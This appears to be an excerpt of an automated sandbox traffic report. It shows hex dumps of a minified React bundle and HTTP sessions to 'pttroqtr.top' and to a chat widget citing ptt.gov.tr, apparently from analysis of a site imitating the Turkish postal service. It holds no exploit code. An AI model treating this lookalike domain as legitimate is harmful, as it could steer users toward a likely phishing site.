                                                                                                                                                                                            2024-09-28 03:39:43 UTC6870INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 37 34 5d 2c 7b 32 37 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 32 34 36 36 29 2c 6c 3d 74 28 31 30 36 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 65 2c 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 6e 2b 3d 22 26 61 72 67 73 5b 5d 3d 22 2b 65 6e 63 6f 64 65 55 52 49
                                                                                                                                                                                            Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURI
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 22 5c 6e 22 29 2c 6f 3d 6c 2e 6c 65 6e 67 74 68 2d 31 2c 75 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 31 3c 3d 6f 26 26 30 3c 3d 75 26 26 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 3b 29 75 2d 2d 3b 66 6f 72 28 3b 31 3c 3d 6f 26 26 30 3c 3d 75 3b 6f 2d 2d 2c 75 2d 2d 29 69 66 28 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 69 66 28 31 21 3d 3d 6f 7c 7c 31 21 3d 3d 75 29 64 6f 7b 69 66 28 6f 2d 2d 2c 30 3e 2d 2d 75 7c 7c 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 76 61 72 20 69 3d 22 5c 6e 22 2b 6c 5b 6f 5d 2e 72 65 70 6c 61 63 65 28 22 20 61 74 20 6e 65 77 20 22 2c 22 20 61 74 20 22 29 3b 72 65 74 75 72 6e 20 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 26 26 69 2e 69 6e 63 6c 75 64 65 73 28 22 3c 61 6e 6f 6e 79 6d 6f 75 73 3e 22 29 26 26 28 69 3d 69 2e 72 65 70 6c 61 63 65 28 22 3c 61
                                                                                                                                                                                            Data Ascii: "\n"),o=l.length-1,u=a.length-1;1<=o&&0<=u&&l[o]!==a[u];)u--;for(;1<=o&&0<=u;o--,u--)if(l[o]!==a[u]){if(1!==o||1!==u)do{if(o--,0>--u||l[o]!==a[u]){var i="\n"+l[o].replace(" at new "," at ");return e.displayName&&i.includes("<anonymous>")&&(i=i.replace("<a
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 61 79 3a 21 30 2c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 3a 21 30 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 21 30 2c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 3a 21 30 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 21 30 7d 2c 6d 65 3d 5b 22 57 65 62 6b 69 74 22 2c 22 6d 73 22 2c 22 4d 6f 7a 22 2c 22 4f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 68 65 28 65 2c 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 22 22 3d 3d 3d 6e 3f 22 22 3a 74 7c 7c 22 6e 75 6d 62 65 72 22 21 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 30 3d 3d 3d 6e 7c 7c 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 70 65 5b 65 5d 3f 28 22 22 2b 6e 29 2e 74 72 69 6d 28 29 3a 6e 2b 22 70 78 22 7d
                                                                                                                                                                                            Data Ascii: ay:!0,strokeDashoffset:!0,strokeMiterlimit:!0,strokeOpacity:!0,strokeWidth:!0},me=["Webkit","ms","Moz","O"];function he(e,n,t){return null==n||"boolean"===typeof n||""===n?"":t||"number"!==typeof n||0===n||pe.hasOwnProperty(e)&&pe[e]?(""+n).trim():n+"px"}
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 72 2c 6e 3d 65 2e 74 61 72 67 65 74 43 6f 6e 74 61 69 6e 65 72 73 2c 6e 75 6c 6c 21 3d 3d 6c 26 26 2d 31 3d 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6c 29 26 26 6e 2e 70 75 73 68 28 6c 29 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 6e 28 65 29 7b 76 61 72 20 6e 3d 79 6c 28 65 2e 74 61 72 67 65 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6e 29 7b 76 61 72 20 74 3d 6a 65 28 6e 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 69 66 28 31 33 3d 3d 3d 28 6e 3d 74 2e 74 61 67 29 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 28 6e 3d 42 65 28 74 29 29 29 72 65 74 75 72 6e 20 65 2e 62 6c 6f 63 6b 65 64 4f 6e 3d 6e 2c 76 6f 69 64 20 43 6e 28 65 2e 70 72 69 6f 72 69 74 79 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 6e 28 74 29 7d 29 29 7d 65 6c 73 65 20 69 66 28 33 3d 3d 3d 6e 26 26 74 2e 73 74
                                                                                                                                                                                            Data Ascii: r,n=e.targetContainers,null!==l&&-1===n.indexOf(l)&&n.push(l),e)}function Un(e){var n=yl(e.target);if(null!==n){var t=je(n);if(null!==t)if(13===(n=t.tag)){if(null!==(n=Be(t)))return e.blockedOn=n,void Cn(e.priority,(function(){En(t)}))}else if(3===n&&t.st
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 43 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 65 2e 74 79 70 65 3f 65 2e 6b 65 79 43 6f 64 65 3a 30 7d 2c 77 68 69 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6b 65 79 70 72 65 73 73 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 74 28 65 29 3a 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 65 2e 74 79 70 65 3f 65 2e 6b 65 79 43 6f 64 65 3a 30 7d 7d 29 2c 50 74 3d 61 74 28 43 74 29 2c 4e 74 3d 61 74 28 49 28 7b 7d 2c 70 74 2c 7b 70 6f 69 6e 74 65 72 49 64 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 70 72 65 73 73 75 72 65 3a 30 2c 74 61 6e 67 65 6e 74 69 61 6c 50 72 65 73 73
                                                                                                                                                                                            Data Ascii: Code:function(e){return"keydown"===e.type||"keyup"===e.type?e.keyCode:0},which:function(e){return"keypress"===e.type?tt(e):"keydown"===e.type||"keyup"===e.type?e.keyCode:0}}),Pt=at(Ct),Nt=at(I({},pt,{pointerId:0,width:0,height:0,pressure:0,tangentialPress
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 22 6f 6e 43 68 61 6e 67 65 22 2c 22 63 68 61 6e 67 65 20 63 6c 69 63 6b 20 66 6f 63 75 73 69 6e 20 66 6f 63 75 73 6f 75 74 20 69 6e 70 75 74 20 6b 65 79 64 6f 77 6e 20 6b 65 79 75 70 20 73 65 6c 65 63 74 69 6f 6e 63 68 61 6e 67 65 22 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 69 28 22 6f 6e 53 65 6c 65 63 74 22 2c 22 66 6f 63 75 73 6f 75 74 20 63 6f 6e 74 65 78 74 6d 65 6e 75 20 64 72 61 67 65 6e 64 20 66 6f 63 75 73 69 6e 20 6b 65 79 64 6f 77 6e 20 6b 65 79 75 70 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 73 65 6c 65 63 74 69 6f 6e 63 68 61 6e 67 65 22 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 69 28 22 6f 6e 42 65 66 6f 72 65 49 6e 70 75 74 22 2c 5b 22 63 6f 6d 70 6f 73 69 74 69 6f 6e 65 6e 64 22 2c 22 6b 65 79 70 72 65 73 73 22 2c 22 74 65 78 74
                                                                                                                                                                                            Data Ascii: "onChange","change click focusin focusout input keydown keyup selectionchange".split(" ")),i("onSelect","focusout contextmenu dragend focusin keydown keyup mousedown mouseup selectionchange".split(" ")),i("onBeforeInput",["compositionend","keypress","text
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 61 67 29 3b 72 65 74 75 72 6e 20 65 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 72 28 65 2c 6e 2c 74 2c 72 2c 6c 29 7b 66 6f 72 28 76 61 72 20 61 3d 6e 2e 5f 72 65 61 63 74 4e 61 6d 65 2c 6f 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 74 26 26 74 21 3d 3d 72 3b 29 7b 76 61 72 20 75 3d 74 2c 69 3d 75 2e 61 6c 74 65 72 6e 61 74 65 2c 73 3d 75 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 69 26 26 69 3d 3d 3d 72 29 62 72 65 61 6b 3b 35 3d 3d 3d 75 2e 74 61 67 26 26 6e 75 6c 6c 21 3d 3d 73 26 26 28 75 3d 73 2c 6c 3f 6e 75 6c 6c 21 3d 28 69 3d 52 65 28 74 2c 61 29 29 26 26 6f 2e 75 6e 73 68 69 66 74 28 57 72 28 74 2c 69 2c 75 29 29 3a 6c 7c 7c 6e 75 6c 6c 21 3d 28 69 3d 52 65 28 74 2c 61 29 29 26 26 6f 2e 70 75 73 68 28 57 72 28 74 2c 69 2c 75 29
                                                                                                                                                                                            Data Ascii: ag);return e||null}function Kr(e,n,t,r,l){for(var a=n._reactName,o=[];null!==t&&t!==r;){var u=t,i=u.alternate,s=u.stateNode;if(null!==i&&i===r)break;5===u.tag&&null!==s&&(u=s,l?null!=(i=Re(t,a))&&o.unshift(Wr(t,i,u)):l||null!=(i=Re(t,a))&&o.push(Wr(t,i,u)
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 6e 2c 6e 75 6c 6c 21 3d 3d 28 74 3d 65 2e 61 6c 74 65 72 6e 61 74 65 29 26 26 28 74 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 6e 29 2c 74 3d 65 2c 65 3d 65 2e 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 33 3d 3d 3d 74 2e 74 61 67 3f 74 2e 73 74 61 74 65 4e 6f 64 65 3a 6e 75 6c 6c 7d 76 61 72 20 54 61 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 65 29 7b 65 2e 75 70 64 61 74 65 51 75 65 75 65 3d 7b 62 61 73 65 53 74 61 74 65 3a 65 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 2c 66 69 72 73 74 42 61 73 65 55 70 64 61 74 65 3a 6e 75 6c 6c 2c 6c 61 73 74 42 61 73 65 55 70 64 61 74 65 3a 6e 75 6c 6c 2c 73 68 61 72 65 64 3a 7b 70 65 6e 64 69 6e 67 3a 6e 75 6c 6c 2c 69 6e 74 65 72 6c 65 61 76 65 64 3a 6e 75 6c 6c 2c 6c 61 6e 65
                                                                                                                                                                                            Data Ascii: .childLanes|=n,null!==(t=e.alternate)&&(t.childLanes|=n),t=e,e=e.return;return 3===t.tag?t.stateNode:null}var Ta=!1;function La(e){e.updateQueue={baseState:e.memoizedState,firstBaseUpdate:null,lastBaseUpdate:null,shared:{pending:null,interleaved:null,lane
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 5d 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 6e 2c 74 2c 72 2c 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 37 21 3d 3d 6e 2e 74 61 67 3f 28 28 6e 3d 4f 73 28 74 2c 65 2e 6d 6f 64 65 2c 72 2c 61 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 29 3a 28 28 6e 3d 6c 28 6e 2c 74 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 6e 2c 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 26 26 22 22 21 3d 3d 6e 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 28 6e 3d 49 73 28 22 22 2b 6e 2c 65 2e 6d 6f 64 65 2c 74 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 26
                                                                                                                                                                                            Data Ascii: ])).return=e,n)}function f(e,n,t,r,a){return null===n||7!==n.tag?((n=Os(t,e.mode,r,a)).return=e,n):((n=l(n,t)).return=e,n)}function d(e,n,t){if("string"===typeof n&&""!==n||"number"===typeof n)return(n=Is(""+n,e.mode,t)).return=e,n;if("object"===typeof n&
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 74 63 68 2c 6c 3d 74 2e 70 65 6e 64 69 6e 67 2c 6f 3d 6e 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6c 29 7b 74 2e 70 65 6e 64 69 6e 67 3d 6e 75 6c 6c 3b 76 61 72 20 75 3d 6c 3d 6c 2e 6e 65 78 74 3b 64 6f 7b 6f 3d 65 28 6f 2c 75 2e 61 63 74 69 6f 6e 29 2c 75 3d 75 2e 6e 65 78 74 7d 77 68 69 6c 65 28 75 21 3d 3d 6c 29 3b 75 72 28 6f 2c 6e 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 29 7c 7c 28 6b 75 3d 21 30 29 2c 6e 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 6f 2c 6e 75 6c 6c 3d 3d 3d 6e 2e 62 61 73 65 51 75 65 75 65 26 26 28 6e 2e 62 61 73 65 53 74 61 74 65 3d 6f 29 2c 74 2e 6c 61 73 74 52 65 6e 64 65 72 65 64 53 74 61 74 65 3d 6f 7d 72 65 74 75 72 6e 5b 6f 2c 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 4c 6f 28 29 7b 7d 66 75 6e
                                                                                                                                                                                            Data Ascii: tch,l=t.pending,o=n.memoizedState;if(null!==l){t.pending=null;var u=l=l.next;do{o=e(o,u.action),u=u.next}while(u!==l);ur(o,n.memoizedState)||(ku=!0),n.memoizedState=o,null===n.baseQueue&&(n.baseState=o),t.lastRenderedState=o}return[o,r]}function Lo(){}fun


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            142192.168.2.5498778.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:43 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjd-1&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:44 UTC166INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:44 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            143192.168.2.5498838.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjdin&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:44 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:44 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:44 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            144192.168.2.54987834.107.233.184432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1060OUTGET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1
                                                                                                                                                                                            Host: chatserver.alo-tech.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:44 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: gunicorn
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:44 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                            Vary: Accept-Encoding, Accept-Language
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Content-Language: tr
                                                                                                                                                                                            Content-Length: 184698
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 6c 6f 43 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 61 73 73 65 74 73 2f 6a 73
                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <title>AloChat</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <script type="text/javascript" src="/static/assets/js
                                                                                                                                                                                            2024-09-28 03:39:44 UTC18INData Raw: 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 61 73 73 65
                                                                                                                                                                                            Data Ascii: src="/static/asse
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 74 73 2f 6a 73 2f 75 61 2d 70 61 72 73 65 72 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6c 61 6e 67 63 6f 64 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 70 74 74 65 6d 2e 61 6c 6f 2d 74 65 63 68 2e 63 6f 6d 2f 63 68 61 74 2f
                                                                                                                                                                                            Data Ascii: ts/js/ua-parser.min.js"></script> <script defer src="/static/assets/js/langcodes.min.js"></script> <script defer type="text/javascript" src="/static/assets/js/owl.carousel.min.js"></script> <link href="//pttem.alo-tech.com/chat/
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 6d 75 74 65 5f 63 68 61 74 3a 20 22 53 65 73 73 69 7a 65 20 61 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 6e 6d 75 74 65 5f 63 68 61 74 3a 20 22 53 65 73 69 6e 69 20 41 c3 a7 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 76 61 6c 75 61 74 69 6f 6e 5f 74 68 61 6e 6b 73 3a 20 22 44 65 c4 9f 65 72 6c 65 6e 64 69 72 6d 65 6e 69 7a 20 69 c3 a7 69 6e 20 74 65 c5 9f 65 6b 6b c3 bc 72 6c 65 72 2e 22 0a 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 6e 65 74 64 6e 61 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 33 2e 32 2e 31 2f 63 73 73 2f
                                                                                                                                                                                            Data Ascii: mute_chat: "Sessize al", unmute_chat: "Sesini A", evaluation_thanks: "Deerlendirmeniz iin teekkrler." }; </script> <style> @import url(//netdna.bootstrapcdn.com/font-awesome/3.2.1/css/
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1316INData Raw: 20 20 20 23 73 70 65 65 63 68 54 6f 54 65 78 74 4c 61 6e 67 44 72 6f 70 64 6f 77 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 20 77 69 64 74 68 3a 20 32 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 20 2f 2a 20 72 65 6d 6f 76 65 20 64 65 66 61 75 6c 74 20 6d 61 72 67 69 6e 20 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 20 2f 2a 20 72 65 6d 6f 76 65 20 64 65 66 61 75 6c 74 20 70 61 64 64 69 6e 67 20 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 20 2f 2a 20 74 61 6b 65 20 66 75 6c 6c 20 62 72 6f 77 73 65 72 20 77 69 64
                                                                                                                                                                                            Data Ascii: #speechToTextLangDropdown { height: 200px; width: 200px; } html, body { margin:0; /* remove default margin */ padding:0; /* remove default padding */ width:100%; /* take full browser wid
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 6c 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 69 6d 65 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 77 65 65 6b 22 5d 2c 0a 20 20 20 20 20 20
